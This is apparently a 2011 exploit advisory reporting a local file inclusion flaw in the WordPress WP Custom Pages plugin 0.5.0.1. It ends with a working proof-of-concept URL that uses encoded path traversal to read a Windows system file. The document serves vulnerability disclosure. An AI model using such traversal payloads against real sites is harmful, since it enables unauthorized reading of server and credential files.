ExploitFixes
WordPress WP Custom Pages Plugin 0.5.0.1 LFI Vulnerability 2011-04-05 13:15:16

------------------------------------------------------------------------
Software................WordPress WP Custom Pages 0.5.0.1
Vulnerability...........Local File Inclusion
Threat Level............Critical (4/5)
Download................http://wordpress.org/extend/plugins/wp-custom-pages/
Discovery Date..........4/3/2011
Tested On...............Windows Vista + XAMPP
------------------------------------------------------------------------
Author..................AutoSec Tools
Site....................http://www.autosectools.com/
Email...................John Leitch <[email protected]>
------------------------------------------------------------------------


--PoC--

http://localhost/wordpress/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini